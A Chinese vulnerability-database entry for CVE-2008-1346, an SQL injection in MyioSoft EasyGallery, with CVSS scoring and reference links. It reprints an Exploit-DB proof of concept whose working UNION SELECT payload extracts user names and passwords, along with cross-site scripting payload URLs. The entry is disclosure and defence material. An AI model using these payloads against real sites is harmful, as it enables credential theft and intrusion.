CVE-2008-1346 |
|
发布时间 :2008-03-17 12:44:00 | ||
修订时间 :2008-09-05 17:37:30 | ||||
NMCOE |
[原文]SQL injection vulnerability in staticpages/easygallery/index.php in MyioSoft EasyGallery 5.0tr and earlier allows remote attackers to execute arbitrary SQL commands via the catid parameter in a category action.
[CNNVD]EasyGallery ‘index.php’ SQL注入漏洞 (CNNVD-200803-239)
MyioSoft EasyGallery中的staticpages/easygallery/index.php存在SQL注入漏洞。远程攻击者通过一个分类操作中的catid参数来执行任意SQL命令。
–
CVSS (基础分值)
CVSS分值: | 7.5 | [严重(HIGH)] |
机密性影响: | PARTIAL | [很可能造成信息泄露] |
完整性影响: | PARTIAL | [可能会导致系统文件被修改] |
可用性影响: | PARTIAL | [可能会导致性能下降或中断资源访问] |
攻击复杂度: | LOW | [漏洞利用没有访问限制 ] |
攻击向量: | NETWORK | [攻击者不需要获取内网访问权或本地访问权] |
身份认证: | NONE | [漏洞利用无需身份认证] |
–
CWE (弱点类目)
CWE-89 | [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)] |
–
CPE (受影响的平台与产品)
产品及版本信息(CPE)暂不可用 |
–
OVAL (用于检测的技术细节)
未找到相关OVAL定义 |
–
官方数据库链接
–
其它链接及资源
http://www.securityfocus.com/bid/28233 (UNKNOWN) BID 28233 |
http://www.milw0rm.com/exploits/5247 (UNKNOWN) MILW0RM 5247 |
http://secunia.com/advisories/29372 (VENDOR_ADVISORY) SECUNIA 29372 |
http://xforce.iss.net/xforce/xfdb/41185 (UNKNOWN) XF easygallery-index-sql-injection(41185) |
http://www.securityfocus.com/archive/1/archive/1/489583/100/0/threaded (UNKNOWN) BUGTRAQ 20080314 EasyGallery <= 5.0tr - Multiple Remote Vulnerabilities |
–
漏洞信息
EasyGallery ‘index.php’ SQL注入漏洞 | |
高危 | SQL注入 |
2008-03-17 00:00:00 | 2008-09-05 00:00:00 |
远程 | |
MyioSoft EasyGallery中的staticpages/easygallery/index.php存在SQL注入漏洞。远程攻击者通过一个分类操作中的catid参数来执行任意SQL命令。 |
–
公告与补丁
目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://myiosoft.com/ |
–
漏洞信息 (5247)
EasyGallery <= 5.0tr Multiple Remote Vulnerabilities (EDBID:5247) | |
php | webapps |
2008-03-12 | Verified |
0 | JosS |
N/A |
[点击下载] |
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ EasyGallery <= 5.0tr - Multiple Remote Vulnerabilities +==-- --==+====================================================================================+==-- [+] [JosS] + [Spanish Hackers Team] + [Sys - Project] [+] Info: [~] Software: EasyGallery [~] HomePage: http://myiosoft.com [~] Exploit: Multiple Remote Vulnerabilities [High] [~] Bug Found By: JosS [~] Contact: sys-project[at]hotmail.com [~] Web: http://www.spanish-hackers.com [~] Verified in localhost with EasyGallery 5.0tr and magic_quotes Off [+] Remote SQL Injection: [~] Vuln File: index.php [~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?page=category&PageSection=0&catid=[SQL] [~] Example: -1+union+all+select+1,2,3,concat(puUsername,char(54),puPassword),5,6,7,8,9,0,1+from+edp_puusers/* [+] Cross Site Scripting in URI: [~] Vuln File: index.php [~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php/[XSS] [~] Example: >"> [+] Cross Site Scripting: [~] Vuln File: index.php [~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?help=about&q=[XSS] [~] Example: %22+onmouseover=alert("JosS")+ --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ JosS +==-- --==+====================================================================================+==-- [+] [The End] # milw0rm.com [2008-03-12]
–
漏洞信息
42866 |
|
EasyGallery staticpages/easygallery/index.php catid Parameter SQL Injection | |
Remote / Network Access |
Information Disclosure, Input Manipulation |
Loss of Confidentiality, Loss of Integrity |
Solution Unknown |
Exploit Public | Uncoordinated Disclosure |
–
漏洞描述
EasyGallery contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'staticpages/easygallery/index.php' script not properly sanitizing user-supplied input to the 'catid' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database. |
–
时间线
2008-03-12 |
Unknow |
2008-03-12 | Unknow |